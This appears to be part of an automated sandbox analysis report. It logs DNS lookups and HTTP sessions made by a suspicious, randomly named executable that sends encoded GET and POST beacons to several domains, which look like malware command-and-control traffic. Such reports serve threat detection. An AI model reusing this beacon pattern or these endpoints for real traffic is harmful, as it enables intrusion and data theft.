                                                          Jan 11, 2025 01:41:32.770313978 CET53632731.1.1.1192.168.2.5
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jan 11, 2025 01:39:52.780023098 CET192.168.2.51.1.1.10xfe5eStandard query (0)www.izmirescortg.xyzA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:40:08.538233042 CET192.168.2.51.1.1.10x3850Standard query (0)www.aballanet.catA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:40:22.070087910 CET192.168.2.51.1.1.10xaca5Standard query (0)www.madhf.techA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:40:35.960539103 CET192.168.2.51.1.1.10xe79aStandard query (0)www.canadavinreport.siteA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:40:49.492259979 CET192.168.2.51.1.1.10x1d2cStandard query (0)www.yunlekeji.topA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:40:50.487972975 CET192.168.2.51.1.1.10x1d2cStandard query (0)www.yunlekeji.topA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:41:04.319333076 CET192.168.2.51.1.1.10x2325Standard query (0)www.logidant.xyzA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:41:18.662542105 CET192.168.2.51.1.1.10xa064Standard query (0)www.laohub10.netA (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:41:32.758327961 CET192.168.2.51.1.1.10x9554Standard query (0)www.zkdamdjj.shopA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jan 11, 2025 01:39:52.798819065 CET1.1.1.1192.168.2.50xfe5eNo error (0)www.izmirescortg.xyz104.21.36.62A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:39:52.798819065 CET1.1.1.1192.168.2.50xfe5eNo error (0)www.izmirescortg.xyz172.67.186.192A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:40:08.570329905 CET1.1.1.1192.168.2.50x3850No error (0)www.aballanet.cataballanet.catCNAME (Canonical name)IN (0x0001)false
                                                          Jan 11, 2025 01:40:08.570329905 CET1.1.1.1192.168.2.50x3850No error (0)aballanet.cat134.0.14.158A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:40:22.520380020 CET1.1.1.1192.168.2.50xaca5No error (0)www.madhf.tech103.224.182.242A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:40:36.078814030 CET1.1.1.1192.168.2.50xe79aNo error (0)www.canadavinreport.site185.27.134.206A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:40:50.730216980 CET1.1.1.1192.168.2.50x1d2cNo error (0)www.yunlekeji.topwww-yunlekeji-top.lo0.faipod.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 11, 2025 01:40:50.730216980 CET1.1.1.1192.168.2.50x1d2cNo error (0)www-yunlekeji-top.lo0.faipod.comfap-a13f5c64.faipod.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 11, 2025 01:40:50.730216980 CET1.1.1.1192.168.2.50x1d2cNo error (0)fap-a13f5c64.faipod.com165.154.96.210A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:40:50.730252028 CET1.1.1.1192.168.2.50x1d2cNo error (0)www.yunlekeji.topwww-yunlekeji-top.lo0.faipod.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 11, 2025 01:40:50.730252028 CET1.1.1.1192.168.2.50x1d2cNo error (0)www-yunlekeji-top.lo0.faipod.comfap-a13f5c64.faipod.comCNAME (Canonical name)IN (0x0001)false
                                                          Jan 11, 2025 01:40:50.730252028 CET1.1.1.1192.168.2.50x1d2cNo error (0)fap-a13f5c64.faipod.com165.154.96.210A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:41:04.346596003 CET1.1.1.1192.168.2.50x2325No error (0)www.logidant.xyzlogidant.xyzCNAME (Canonical name)IN (0x0001)false
                                                          Jan 11, 2025 01:41:04.346596003 CET1.1.1.1192.168.2.50x2325No error (0)logidant.xyz45.141.156.114A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:41:19.220487118 CET1.1.1.1192.168.2.50xa064No error (0)www.laohub10.netr0lqcud7.nbnnn.xyzCNAME (Canonical name)IN (0x0001)false
                                                          Jan 11, 2025 01:41:19.220487118 CET1.1.1.1192.168.2.50xa064No error (0)r0lqcud7.nbnnn.xyz27.124.4.246A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:41:19.220487118 CET1.1.1.1192.168.2.50xa064No error (0)r0lqcud7.nbnnn.xyz202.79.161.151A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:41:19.220487118 CET1.1.1.1192.168.2.50xa064No error (0)r0lqcud7.nbnnn.xyz23.225.159.42A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:41:19.220487118 CET1.1.1.1192.168.2.50xa064No error (0)r0lqcud7.nbnnn.xyz23.225.160.132A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:41:32.770313978 CET1.1.1.1192.168.2.50x9554No error (0)www.zkdamdjj.shop188.114.96.3A (IP address)IN (0x0001)false
                                                          Jan 11, 2025 01:41:32.770313978 CET1.1.1.1192.168.2.50x9554No error (0)www.zkdamdjj.shop188.114.97.3A (IP address)IN (0x0001)false
                                                          • www.izmirescortg.xyz
                                                          • www.aballanet.cat
                                                          • www.madhf.tech
                                                          • www.canadavinreport.site
                                                          • www.yunlekeji.top
                                                          • www.logidant.xyz
                                                          • www.laohub10.net
                                                          • www.zkdamdjj.shop
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.549843104.21.36.62803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:39:52.821410894 CET381OUTGET /lnl7/?KBEhCJ=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgfVGx56k02tXkAzZldWa3Ro5vlhsr06JocjtffJpgas7XnA==&Kdr=RN-HMNoXj6pXm HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          Host: www.izmirescortg.xyz
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Jan 11, 2025 01:39:53.476918936 CET1236INHTTP/1.1 404 Not Found
                                                          Date: Sat, 11 Jan 2025 00:39:53 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                          Pragma: no-cache
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mvhWCnu5Ui1mrwC9nhT%2B9XIMY43LpfSSC5GvumEt%2B1w1%2FkQ56DQDs218sZseLGJVQEgeyRJDqmX1zo8tehzWAWXRHvDwEelmVyFIm6dRsWtFWv7RUUHbPDCFFqFpLCaPN%2BP%2F7LTZWA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 9000da2d9e2442e0-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1669&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=381&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e [TRUNCATED]
                                                          Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div
                                                          Jan 11, 2025 01:39:53.476967096 CET886INData Raw: 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f
                                                          Data Ascii: style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.549941134.0.14.158803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:40:08.593410969 CET635OUTPOST /6xrr/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 207
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Host: www.aballanet.cat
                                                          Origin: http://www.aballanet.cat
                                                          Referer: http://www.aballanet.cat/6xrr/
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Data Raw: 4b 42 45 68 43 4a 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 34 6c 45 42 70 41 51 43 7a 4d 39 54 61 38 62 70 39 76 31 41 32 58 50 77 33 38 6e 73 4f 45 64 35 44 34 44 63 63 41 54 62 45 6d 53 62 4b 45 6e 72 45 32 49 4e 39 36 43 68 55 58 49 4f 41 62 51 74 47 71 46 46 61 75 65 52 65 4c 36 70 34 52 6f 57 6a 4a 5a 35 39 34 58 70 33 4c 2f 41 2f 32 70 37 39 4d 34 2f 54 5a 6f 50 64 7a 6c 43 57 76 71 37 6a 59 2f 41 36 76 70 31 4b 59 5a 56 36 67 4d 52 69 67 6a 5a 50 48 43 4d 61 30 52 72 76 39 2b 68 6d 5a 4d 52 34 68 75 31 5a 58 54 70 51 53 69 58 72 30 44 4f 58 67 33 75 44 6a 6b 45 39 41 68 70 56 55 47 75 6d 38 2b 61 71 47 59 3d
                                                          Data Ascii: KBEhCJ=KzhgXQhB/IGl4lEBpAQCzM9Ta8bp9v1A2XPw38nsOEd5D4DccATbEmSbKEnrE2IN96ChUXIOAbQtGqFFaueReL6p4RoWjJZ594Xp3L/A/2p79M4/TZoPdzlCWvq7jY/A6vp1KYZV6gMRigjZPHCMa0Rrv9+hmZMR4hu1ZXTpQSiXr0DOXg3uDjkE9AhpVUGum8+aqGY=
                                                          Jan 11, 2025 01:40:09.530838013 CET1236INHTTP/1.1 404 Not Found
                                                          Date: Sat, 11 Jan 2025 00:40:09 GMT
                                                          Server: Apache
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
                                                          Upgrade: h2,h2c
                                                          Connection: Upgrade, close
                                                          Transfer-Encoding: chunked
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 [TRUNCATED]
                                                          Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UP
                                                          Jan 11, 2025 01:40:09.530857086 CET1236INData Raw: 43 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69
                                                          Data Ascii: C"> <meta name='robots' content='noindex, follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin v23.1 - https://yoa
                                                          Jan 11, 2025 01:40:09.530870914 CET1236INData Raw: 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77
                                                          Data Ascii: .w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/aballanet.cat\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};
                                                          Jan 11, 2025 01:40:09.530942917 CET1236INData Raw: 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e
                                                          Data Ascii: u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!
                                                          Jan 11, 2025 01:40:09.530955076 CET1236INData Raw: 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65
                                                          Data Ascii: wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t
                                                          Jan 11, 2025 01:40:09.530966043 CET1236INData Raw: 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 69
                                                          Data Ascii: ' /><link rel='stylesheet' id='wp-components-css' href='http://aballanet.cat/wp-includes/css/dist/components/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='wp-preferences-css' href='http://aballanet.cat/wp-includes/css/dis
                                                          Jan 11, 2025 01:40:09.530978918 CET1236INData Raw: 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e 36 36 37 65 6d 20 2b 20 32 70 78 29 20 63 61 6c 63 28 31 2e 33 33 33 65 6d 20 2b 20 32 70 78 29 3b 66 6f 6e 74 2d 73 69
                                                          Data Ascii: w:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-inline-css' type='text/css'>:root{--wp--
                                                          Jan 11, 2025 01:40:09.530992031 CET1236INData Raw: 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30 29 20 30 25 2c 72 67 62 28 30 2c 32 30 38 2c 31 33 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64
                                                          Data Ascii: eg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red:
                                                          Jan 11, 2025 01:40:09.531002998 CET1236INData Raw: 64 6e 69 67 68 74 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 2c 33 2c 31 32 39 29 20 30 25 2c 72 67 62 28 34 30 2c 31 31 36 2c 32 35 32 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d
                                                          Data Ascii: dnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--
                                                          Jan 11, 2025 01:40:09.531016111 CET1236INData Raw: 2e 32 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 31 2e 32 35 65 6d 3b 7d 2e 68 61 73 2d 62 6c 61 63 6b 2d 63 6f 6c 6f
                                                          Data Ascii: .25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{c
                                                          Jan 11, 2025 01:40:09.537009954 CET1236INData Raw: 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 77 68 69 74 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e
                                                          Data Ascii: preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.549954134.0.14.158803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:40:11.134444952 CET655OUTPOST /6xrr/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 227
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Host: www.aballanet.cat
                                                          Origin: http://www.aballanet.cat
                                                          Referer: http://www.aballanet.cat/6xrr/
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Data Raw: 4b 42 45 68 43 4a 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 36 46 55 42 79 6d 59 43 31 73 39 51 56 63 62 70 33 50 31 4d 32 58 4c 77 33 39 7a 61 4f 32 35 35 47 70 7a 63 4f 31 2f 62 48 6d 53 62 65 30 6e 75 4b 57 4a 44 39 36 48 53 55 57 6b 4f 41 62 55 74 47 6f 4e 46 61 5a 79 65 66 62 36 72 6a 68 6f 55 70 70 5a 35 39 34 58 70 33 4b 61 64 2f 32 78 37 39 63 49 2f 54 39 31 39 44 6a 6c 42 47 2f 71 37 6e 59 2f 45 36 76 70 62 4b 5a 46 76 36 69 30 52 69 6b 6e 5a 4f 57 43 4c 54 30 52 79 77 74 2f 6b 6d 59 34 55 34 52 79 55 51 48 71 56 44 54 37 75 75 43 79 6b 4e 43 2f 47 51 44 49 38 74 54 70 65 45 6b 6e 48 38 66 75 71 30 52 4d 72 42 57 72 79 77 2f 69 52 69 78 54 2b 65 2f 74 50 6d 47 39 77
                                                          Data Ascii: KBEhCJ=KzhgXQhB/IGl6FUBymYC1s9QVcbp3P1M2XLw39zaO255GpzcO1/bHmSbe0nuKWJD96HSUWkOAbUtGoNFaZyefb6rjhoUppZ594Xp3Kad/2x79cI/T919DjlBG/q7nY/E6vpbKZFv6i0RiknZOWCLT0Rywt/kmY4U4RyUQHqVDT7uuCykNC/GQDI8tTpeEknH8fuq0RMrBWryw/iRixT+e/tPmG9w
                                                          Jan 11, 2025 01:40:11.995790005 CET1236INHTTP/1.1 404 Not Found
                                                          Date: Sat, 11 Jan 2025 00:40:11 GMT
                                                          Server: Apache
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
                                                          Upgrade: h2,h2c
                                                          Connection: Upgrade, close
                                                          Transfer-Encoding: chunked
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 [TRUNCATED]
                                                          Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UP
                                                          Jan 11, 2025 01:40:11.995878935 CET224INData Raw: 43 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69
                                                          Data Ascii: C"> <meta name='robots' content='noindex, follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin
                                                          Jan 11, 2025 01:40:11.995891094 CET1236INData Raw: 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63
                                                          Data Ascii: v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="ca_ES" /><meta property="og:title" content="Pgina no trobada - Albert Aballanet" /><meta property="og:site_name" content="Albert Aballanet" /><sc
                                                          Jan 11, 2025 01:40:11.995903969 CET1236INData Raw: 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 37 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75
